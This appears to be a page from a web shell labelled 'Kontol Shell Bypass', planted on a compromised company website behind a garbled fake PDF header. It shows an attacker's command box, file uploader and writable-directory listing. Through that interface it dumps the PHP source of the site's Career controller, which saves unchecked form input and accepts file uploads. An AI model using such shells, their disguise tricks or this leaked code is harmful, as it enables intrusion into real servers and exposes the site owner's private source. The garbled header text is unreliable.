%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardacorporation.net/application/controllers/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardacorporation.net/application/controllers/Career.php
<?php

defined('BASEPATH') OR exit('No direct script access allowed');

class Career extends MY_Controller 
{
    public function __construct()
    {
        parent::__construct();
        $this->load->model(array('admin/Business_model','Common_model'));
    }

    public function index()
    {
		$data = array();
        $head = array();
        $head['title'] = 'Career|Sharda Group';
        $head['keywords'] = 'Career|Sharda Group';
        $head['description'] = 'Career|Sharda Group';

         //Get banner details
         $data['bannerArray'] = $this->Common_model->getSingleRecord('tbl_banners','*',array('is_deleted'=>'0','status'=>'1','banner_type'=>'15'));      
        // Get Career Content 
        $page = 'career';
        $page = $this->Public_model->getOnePage($page);
        $this->goOut($page);
        $data['title'] = $page['name'];
        $data['content'] = $page['content'];
        // Get exceptional-team Content 
		$page1 = 'exceptional-team';
		$page1 = $this->Public_model->getOnePage($page1);
		$this->goOut($page1);
		$data['exceptional_team_title'] = $page1['name'];
        $data['exceptional_team_content'] = $page1['content'];
        // Get work-balance Content 
        $page2 = 'work-balance';
        $page2 = $this->Public_model->getOnePage($page2);
		$this->goOut($page2);
		$data['work_balance_title'] = $page2['name'];
        $data['work_balance_content'] = $page2['content'];

        $data['categoryArray'] = $this->Business_model->getcategory('tbl_positions_category',NULL,NULL);
        $positionArray = $this->Common_model->getAllRecords('tbl_positions','*');
        $positionNewArray = array();
		foreach ($positionArray as $val) {
			$positionNewArray[$val['category']][] = $val;
			$positionNewArray['all'][] = $val;
		}
        $data['positionNewArray'] = $positionNewArray;

        $data['business'] = $this->Business_model->getBusinesses(NULL,NULL);

		$arrSeo = $this->Public_model->getSeo('career');
		$head['title'] = @$arrSeo['title'];
		$head['description'] = @$arrSeo['description'];
		$head['keywords'] = @$arrSeo['keywords'];
		
        //Load View       
        $this->render('career', $head, $data);

    }

    /*
	* Function : goOut
	*/
	private function goOut($page)
    {
        if ($page == null) {
            redirect();
        }
    }

    public function registrationsuccessful(){
        if(@$_POST['submit']=='Submit') {
			$name = $_POST['name'];
            $business =  $_POST['business'];
            $email =  $_POST['email'];
            $phone = $_POST['mobile'];
            $message = $_POST['message'];
            $resume= $_POST['resume'];
            $post = $this->input->post();
            // $req = array('required'=>'%s required.', 'is_unique'=>'This %s is already registered', 'integer'=>'This %s is invalid');
					$params = array();
					$params['status'] = '1';
				    $params['email'] = $email;
				    $params['name'] = $name;
                    $params['phone'] = $phone;
                    $params['message'] = $message;
                    $params['business'] = $business;
                    $params['resume'] = $resume;
                    $params['created'] = date('Y-m-d H:i:s');  
                    $params['modified'] = date('Y-m-d H:i:s');  
               
           
                unset($_POST['submit']);
				$this->Common_model->saveinfo('tbl_job_application_form',$params);
                $data['success_msg'] = '<p style="color:red;">You have Successfully registered.</p>';
                echo '1002';
        
            
    }
    }

    public function detail()
    {
		$data = array();
        $head = array();
        
        $slug = $this->uri->segment(3);
        $data['positionArray'] = $this->Common_model->getSingleRecord('tbl_positions','*',array('is_deleted'=>'0','status'=>'1','slug'=>$slug));

        $head['title'] = $data['positionArray']['position_title'];
        $head['keywords'] = $data['positionArray']['position_title'];
        $head['description'] = $data['positionArray']['position_title'];
        //Load View       
        $this->render('career_detail', $head, $data);

    }

    public function uploadFiles(){
        $filetype = array('jpeg','jpg','png','pdf','txt','docx','PDF');
        foreach ($_FILES as $key )
        {
            $date = time();
        //	echo filesize($key['tmp_name']);
                $file_ext =  pathinfo($key['name'], PATHINFO_EXTENSION);
                $file_name = pathinfo($key['name'], PATHINFO_FILENAME);
                            
                $name = $date.$file_name.'.'.$file_ext;
                $name1 = preg_replace('/\s+/', '_',$name);
                $path= 'attachments/job_files/'.$name1;
                
                if(in_array(strtolower($file_ext), $filetype))
                {
                    if(filesize($key['tmp_name'])<2000000) {
                    @move_uploaded_file($key['tmp_name'],$path);
                    echo $name1;
                    }  else  { echo "FILE_SIZE_ERROR";   }
                } else {  echo "FILE_TYPE_ERROR";   }
            exit();
        }
    }


}

Kontol Shell Bypass